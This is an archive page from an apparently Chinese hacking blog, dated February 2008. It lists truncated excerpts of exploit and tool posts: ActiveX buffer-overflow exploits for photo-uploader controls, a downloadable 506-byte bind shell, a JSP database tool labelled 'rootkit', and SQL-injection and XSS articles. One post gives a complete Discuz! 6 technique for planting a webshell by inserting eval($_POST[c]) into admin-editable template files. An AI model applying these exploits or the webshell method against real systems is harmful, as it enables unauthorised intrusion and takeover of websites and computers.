2008年2月 的日志

FaceBook PhotoUploader (ImageUploader4.ocx 4.5.57.0) BOF Exploit

2008/02/04 11:47 | 鬼仔 | 工具收集 | 消灭0回复

<!–
FaceBook PhotoUploader Buffer Overflow Exploit
written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, ImageUploader4.ocx 4.5.57.0(FaceBookPhotoUploader2.cab)
The following controls are also vulnerable:

Aurigma ImageUploader4 4.5.70.0 and 4.5.126.0
—————————–
{6E5E167B-1566-4316-B27F-0DDAB3484CF7}
阅读全文 »

Tags: ,

MySpace Uploader (MySpaceUploader.ocx 1.0.0.4) BOF Exploit

2008/02/04 11:46 | 鬼仔 | 工具收集 | 消灭0回复

<!–
MySpace Uploader Buffer Overflow Exploit
written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6
MySpaceUploader.ocx version 1.0.0.4: {48DD0448-9209-4F81-9F6D-D83562940134}
Aurigma ImageUploader4.ocx version version 4.5.70.0: {6E5E167B-1566-4316-B27F-0DDAB3484CF7}
Thanks to h.d.m. and the Metasploit crew
–>
<html>
阅读全文 »

Tags: ,

Win32最小的多用户Shell 1.2 506字节

2008/02/04 11:01 | 鬼仔 | 工具收集 | 消灭0回复

作者:Anskya
来源:邪恶八进制

BindShell.体积仅有506字节!!!!
优化到这样估计也很难在优化下去了。。。能写的地方基本上都写满了
这个东西也暂时告一段楼。。。

祝大家新年新气象。。。
开开心心过好年,也为回不了家的朋友们祝福一下
没事,无聊了找兄弟一起吹水看Hot!聊MM。。。
无聊了PM我

下载地址:acom3.rar

Discuz! 6 后台拿Shell的方法

2008/02/04 11:00 | 鬼仔 | 技术文章 | 1 个回复

文章作者:Ryat (lib3r3t)
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注:文章首发狼族(www.wolvez.org),后由原创作者有请提交到邪恶八进制,转载请注明原始作者和出处。

如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)

1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
复制内容到剪贴板
代码:
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
复制内容到剪贴板
代码:
";eval($_POST[c]);"
在前台回帖处选择引用回复。
简单看下代码:

include/newreply.inc.php 107行:
阅读全文 »

Tags: ,

ASJS通信盒子之百度空间相册

2008/02/04 10:58 | 鬼仔 | 技术文章 | 消灭0回复

作者:ycosxhack
来源:余弦函数

Flash与时下流行的Flex(Adobe给出的RIA解决方案,我才开始接触:-()使用的编程语言皆为ActionScript。而JavaScript主要被用于web客户端进行数据的逻辑控制。这两个脚本语言之间的通信模型我称之为ASJS通信盒子
研究这个,我的目的是给XSS增加点新鲜血液,其中会涉及到XML XSS(本文无)。这次的研究对象为百度空间相册,在空间首页中显示的相册功能模块。虽然有好几次的心跳,但还是没XSS成功~~~不过这次分析还是有收获的。比如:我开始写这篇文章了^^
http://www.xsscos.com/test.php?xss=hello-world这样格式的url不陌生吧? 阅读全文 »

Tags: ,

武林争霸 鹿死谁手 nProtect VS HackShield

2008/02/04 10:57 | 鬼仔 | 技术文章 | 1 个回复

文章作者:zhuwg
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

先祝大家新年快乐:rose :rose 红包多多

偶写的文章貌似都是看的人少,回复的人更少了,不知道是偶的RP有问题还是文章写的太差了
这次换个题材把 改用武侠小说中的模式来写 正好偶也很想写1回小说了
不知道会不会感兴趣的人多1点咯

江湖自古分久必合 合久必分,自从上次战争结束,江湖武林一直处于群龙无首的状态
于是坛主选定一个吉日,召开武林大会,广招武林豪杰,各大门派纷纷派出门中兄弟

场地选择在郊外的一片空地上,各门派分居一处,当然还有不少小门派武林人士前来挑战
一时场面煞是热烈
坛主宣布,武林大会正式开始,第一项,各大门派自报身份
来自INCA Internet的弟子第一个走上台来,如今INCA Internet门下的GameGuard风头
阅读全文 »

Tags: ,

JSP版MSSQL连接工具

2008/02/04 10:55 | 鬼仔 | 工具收集 | 消灭0回复

来源:King's Blog

<%@ page import="java.sql.*" contentType="text/html; charset=GBK"%>
<%@ page import="java.util.*"%>
<html>
<head>
<title>rootkit</title>
<script type="javascript">
var db = "master";
function getTables() {
window.open("<%=request.getRequestURL().toString()%>?action=getTables&db="+db,"","scrollbars=yes");
}

阅读全文 »

Tags: ,

再暴风讯整站系统漏洞

2008/02/04 10:46 | 鬼仔 | 技术文章 | 消灭0回复

来源:红狼

文章发表于《黑客防线》0802期

再暴风讯整站系统漏洞
图/文
Cool_wXd
在这里住管前一段时间风讯爆出了两个高危的注入漏洞,再看了oldjun与flyh4t的检测之后我的心也有些痒了,于是也从网上下载了程序检测起来,下面看我的分析报告吧!
风讯的防SQL注入是通过NoSqlHack进行过滤的,不过管理员在写程序的时候总是容易疏忽,我想我们钻的也就是这样的漏洞吧。好了,我们切入正题,经过我的检测,我发现在oldjun与fly 阅读全文 »

Tags: ,